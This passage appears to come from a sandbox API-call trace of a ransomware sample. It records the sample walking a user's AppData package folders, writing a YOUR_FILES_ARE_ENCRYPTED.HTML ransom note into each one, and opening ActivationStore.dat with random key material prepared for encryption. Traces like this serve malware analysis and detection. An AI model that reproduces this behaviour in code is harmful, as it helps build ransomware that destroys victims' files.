lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AppData\\*" [0115.869] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1849e3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1849e3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1849e3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName=".", cAlternateFileName="")) returned 0x626838 [0115.870] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1849e3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1849e3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1849e3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0115.870] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1849e3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1849e3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1849e3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 0 [0115.870] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0115.870] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0115.870] GetProcessHeap () returned 0x600000 [0115.870] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.getstarted_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.871] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.872] CloseHandle (hObject=0x324) returned 1 [0115.872] GetProcessHeap () returned 0x600000 [0115.872] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.872] GetProcessHeap () returned 0x600000 [0115.872] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.873] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1823c56, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1823c56, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1823c56, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0115.873] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.873] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalCache") returned 94 [0115.873] GetProcessHeap () returned 0x600000 [0115.873] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.875] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalCache" [0115.875] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalCache\\*" [0115.875] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1823c56, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1823c56, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1823c56, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName=".", cAlternateFileName="")) returned 0x626838 [0115.875] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1823c56, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1823c56, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1823c56, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0115.875] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1823c56, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1823c56, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1823c56, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 0 [0115.876] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0115.876] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0115.876] GetProcessHeap () returned 0x600000 [0115.876] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.getstarted_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.877] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.878] CloseHandle (hObject=0x324) returned 1 [0115.878] GetProcessHeap () returned 0x600000 [0115.878] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.878] GetProcessHeap () returned 0x600000 [0115.878] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.879] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x176515d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x176515d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x176515d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0115.879] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.880] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalState") returned 94 [0115.880] GetProcessHeap () returned 0x600000 [0115.880] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.881] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalState" [0115.881] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalState\\*" [0115.881] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x176515d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x176515d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x176515d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName=".", cAlternateFileName="")) returned 0x626978 [0115.881] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x176515d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x176515d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x176515d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0115.881] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x176515d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x176515d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x176515d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 0 [0115.881] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0115.881] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0115.881] GetProcessHeap () returned 0x600000 [0115.881] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.882] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.getstarted_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.883] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.884] CloseHandle (hObject=0x324) returned 1 [0115.884] GetProcessHeap () returned 0x600000 [0115.884] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.884] GetProcessHeap () returned 0x600000 [0115.884] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.884] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x262593e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x262593e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x262593e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0115.884] StrStrIW (lpFirst="Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.884] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe") returned 131 [0115.884] GetProcessHeap () returned 0x600000 [0115.884] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.885] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe" [0115.885] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\*" [0115.885] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x262593e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x262593e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x262593e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName=".", cAlternateFileName="")) returned 0x626838 [0115.885] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x262593e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x262593e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x262593e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0115.885] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x262593e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x262593e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x28fa698, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0115.885] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.885] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 147 [0115.885] GetProcessHeap () returned 0x600000 [0115.885] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.886] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore" [0115.886] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0115.886] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x262593e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x262593e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x28fa698, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62ec40, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0115.888] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x262593e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x262593e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x28fa698, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 1 [0115.888] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26e4617, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2d005a9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2d005a9, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x311bec0, dwReserved1=0x62ec40, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0115.888] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.888] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 167 [0115.888] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0115.888] lstrlenW (lpString=".dat") returned 4 [0115.888] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0115.888] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0115.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.getstarted_8wekyb3d8bbwe\\microsoft.getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0115.889] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=16384) returned 1 [0115.889] GetProcessHeap () returned 0x600000 [0115.889] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0115.892] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="D3") returned 2 [0115.892] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="EE") returned 2 [0115.892] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="41") returned 2 [0115.892] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="99") returned 2 [0115.892] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="1F") returned 2 [0115.892] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="78") returned 2 [0115.892] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="1F") returned 2 [0115.892] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="C4") returned 2 [0115.892] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="45") returned 2 [0115.893] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="C8") returned 2 [0115.893] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="60") returned 2 [0115.893] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="47") returned 2 [0115.893] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="E4") returned 2 [0115.893] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="3B") returned 2 [0115.893] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="28") returned 2 [0115.893] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="9A") returned 2 [0115.893] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="1F") returned 2 [0115.893] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="1C") returned 2 [0115.893] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="48") returned 2 [0115.893] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="88") returned 2 [0115.893] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="AC") returned 2 [0115.893] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="4A") returned 2 [0115.893] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="44") returned 2 [0115.893] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="02") returned 2 [0115.893] wsprintfW (in: param_1=0x19ddf6, 